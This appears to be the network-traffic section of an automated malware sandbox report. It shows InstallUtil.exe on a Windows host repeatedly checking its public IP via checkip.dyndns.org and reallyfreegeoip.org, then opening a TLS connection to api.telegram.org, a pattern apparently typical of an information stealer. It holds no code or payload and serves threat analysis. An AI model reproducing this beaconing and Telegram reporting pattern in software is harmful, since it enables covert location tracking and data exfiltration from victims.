Jan 11, 2025 06:14:38.225403070 CET	49987	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:38.225517035 CET	49987	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:38.230246067 CET	80	49987	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:38.793045998 CET	80	49987	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:38.794372082 CET	49988	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:38.794414043 CET	443	49988	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:38.794539928 CET	49988	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:38.794837952 CET	49988	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:38.794852018 CET	443	49988	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:38.838222027 CET	49987	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:39.245210886 CET	443	49988	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:39.247185946 CET	49988	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:39.247212887 CET	443	49988	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:39.376936913 CET	443	49988	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:39.377007008 CET	443	49988	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:39.377285004 CET	49988	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:39.377547026 CET	49988	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:39.380752087 CET	49987	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:39.381932020 CET	49989	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:39.385745049 CET	80	49987	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:39.385807991 CET	49987	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:39.386804104 CET	80	49989	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:39.386879921 CET	49989	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:39.387006998 CET	49989	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:39.391896009 CET	80	49989	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:39.969633102 CET	80	49989	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:39.973017931 CET	49990	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:39.973057032 CET	443	49990	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:39.973123074 CET	49990	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:39.973464012 CET	49990	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:39.973479986 CET	443	49990	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:40.025736094 CET	49989	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:40.446177959 CET	443	49990	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:40.448285103 CET	49990	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:40.448314905 CET	443	49990	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:40.599493980 CET	443	49990	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:40.599556923 CET	443	49990	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:40.599659920 CET	49990	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:40.600261927 CET	49990	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:40.603843927 CET	49989	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:40.605310917 CET	49991	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:40.608762026 CET	80	49989	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:40.608831882 CET	49989	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:40.610126972 CET	80	49991	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:40.610188007 CET	49991	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:40.610260010 CET	49991	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:40.615077972 CET	80	49991	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:41.184684038 CET	80	49991	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:41.204015970 CET	49992	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:41.204056978 CET	443	49992	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:41.204125881 CET	49992	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:41.207900047 CET	49992	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:41.207920074 CET	443	49992	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:41.228863955 CET	49991	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:41.684026003 CET	443	49992	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:41.686014891 CET	49992	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:41.686053991 CET	443	49992	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:41.832226992 CET	443	49992	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:41.832285881 CET	443	49992	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:41.832395077 CET	49992	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:41.832901001 CET	49992	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:41.836261988 CET	49991	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:41.837404013 CET	49993	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:41.841331005 CET	80	49991	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:41.841412067 CET	49991	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:41.842238903 CET	80	49993	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:41.842299938 CET	49993	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:41.842418909 CET	49993	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:41.847192049 CET	80	49993	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:42.434077978 CET	80	49993	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:42.435597897 CET	49994	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:42.435663939 CET	443	49994	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:42.435762882 CET	49994	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:42.436063051 CET	49994	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:42.436079979 CET	443	49994	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:42.478954077 CET	49993	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:42.893491030 CET	443	49994	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:42.895347118 CET	49994	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:42.895410061 CET	443	49994	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:43.037095070 CET	443	49994	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:43.037154913 CET	443	49994	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:43.037323952 CET	49994	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:43.037826061 CET	49994	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:43.040800095 CET	49993	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:43.042597055 CET	49995	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:43.045787096 CET	80	49993	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:43.047569036 CET	80	49995	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:43.047653913 CET	49993	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:43.047653913 CET	49995	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:43.047889948 CET	49995	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:43.052717924 CET	80	49995	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:43.666960955 CET	80	49995	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:43.669158936 CET	49996	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:43.669184923 CET	443	49996	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:43.669341087 CET	49996	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:43.669809103 CET	49996	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:43.669823885 CET	443	49996	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:43.713259935 CET	49995	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:44.141762972 CET	443	49996	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:44.149734974 CET	49996	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:44.149751902 CET	443	49996	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:44.289055109 CET	443	49996	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:44.289144039 CET	443	49996	104.21.112.1	192.168.2.10
Jan 11, 2025 06:14:44.289207935 CET	49996	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:44.289798021 CET	49996	443	192.168.2.10	104.21.112.1
Jan 11, 2025 06:14:44.303029060 CET	49995	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:44.308310032 CET	80	49995	158.101.44.242	192.168.2.10
Jan 11, 2025 06:14:44.308387995 CET	49995	80	192.168.2.10	158.101.44.242
Jan 11, 2025 06:14:44.311249018 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 06:14:44.311290026 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 06:14:44.311355114 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 06:14:44.311784983 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 06:14:44.311799049 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 06:14:44.943058014 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 06:14:44.943183899 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 06:14:44.945071936 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 06:14:44.945086002 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 06:14:44.945359945 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 06:14:44.947168112 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 06:14:44.987344027 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 06:14:45.212538958 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 06:14:45.212620020 CET	443	49997	149.154.167.220	192.168.2.10
Jan 11, 2025 06:14:45.212671995 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 06:14:45.217046022 CET	49997	443	192.168.2.10	149.154.167.220
Jan 11, 2025 06:14:59.732825041 CET	49983	80	192.168.2.10	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 06:14:33.588252068 CET	56737	53	192.168.2.10	1.1.1.1
Jan 11, 2025 06:14:33.595033884 CET	53	56737	1.1.1.1	192.168.2.10
Jan 11, 2025 06:14:34.388488054 CET	49919	53	192.168.2.10	1.1.1.1
Jan 11, 2025 06:14:34.399250031 CET	53	49919	1.1.1.1	192.168.2.10
Jan 11, 2025 06:14:44.303689003 CET	50811	53	192.168.2.10	1.1.1.1
Jan 11, 2025 06:14:44.310415983 CET	53	50811	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 06:14:33.588252068 CET	192.168.2.10	1.1.1.1	0x8aee	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:34.388488054 CET	192.168.2.10	1.1.1.1	0x269	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:44.303689003 CET	192.168.2.10	1.1.1.1	0xf68c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 06:14:33.595033884 CET	1.1.1.1	192.168.2.10	0x8aee	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 06:14:33.595033884 CET	1.1.1.1	192.168.2.10	0x8aee	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:33.595033884 CET	1.1.1.1	192.168.2.10	0x8aee	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:33.595033884 CET	1.1.1.1	192.168.2.10	0x8aee	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:33.595033884 CET	1.1.1.1	192.168.2.10	0x8aee	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:33.595033884 CET	1.1.1.1	192.168.2.10	0x8aee	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:34.399250031 CET	1.1.1.1	192.168.2.10	0x269	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:34.399250031 CET	1.1.1.1	192.168.2.10	0x269	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:34.399250031 CET	1.1.1.1	192.168.2.10	0x269	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:34.399250031 CET	1.1.1.1	192.168.2.10	0x269	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:34.399250031 CET	1.1.1.1	192.168.2.10	0x269	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:34.399250031 CET	1.1.1.1	192.168.2.10	0x269	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:34.399250031 CET	1.1.1.1	192.168.2.10	0x269	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:14:44.310415983 CET	1.1.1.1	192.168.2.10	0xf68c	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49980	158.101.44.242	80	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:14:33.607675076 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 06:14:34.185796976 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: aa720bdc0bbbac4a0b08849dffc5c16b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 06:14:34.190495014 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 06:14:34.345936060 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d6f8e2b6a4f4751daeca5f95992aab75 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 06:14:35.073086977 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 06:14:35.240240097 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7de334103b70771f58e47e1b3f8416be Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49983	158.101.44.242	80	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:14:35.828012943 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 06:14:36.409315109 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a572b98fd41c6549cb343ea53622dd6c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49985	158.101.44.242	80	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:14:37.015734911 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 06:14:37.588841915 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5d07f14ecc9e723f67383f9185ffda85 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49987	158.101.44.242	80	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:14:38.225517035 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 06:14:38.793045998 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 625f18951b7cafc7f1884131f6b3d3c1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49989	158.101.44.242	80	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:14:39.387006998 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 06:14:39.969633102 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: db42d4e071047a3b121c15c276a39dc3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49991	158.101.44.242	80	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:14:40.610260010 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 06:14:41.184684038 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5940d8d7738cadd8a7fd2ac7a865eacd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49993	158.101.44.242	80	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:14:41.842418909 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 06:14:42.434077978 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 13dc4e267c324e9cb301d72e7c010aa8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49995	158.101.44.242	80	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:14:43.047889948 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 06:14:43.666960955 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:43 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ba8841433bdb1f30aa95da6dae55e9bb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49981	104.21.112.1	443	8132	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 05:14:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 05:14:35 UTC	869	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:14:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1887264 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DDKgiQCWoNCh8MZTBAe05zVacf7RyEbi%2B7NXg0%2F4iz%2FleERKx01LYxD%2BB%2B2JO0RFg2ecqouoqmaWC3WlL6a%2BHJmSGtDt3S%2BUUVIpW3aDJ6D3vrwCA%2B257F3NqO8Nka%2BnM5%2B7JJlO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90026c90b9030f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1612&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1779402&cwnd=221&unsent_bytes=0&cid=10da76ae150091aa&ts=184&x=0"
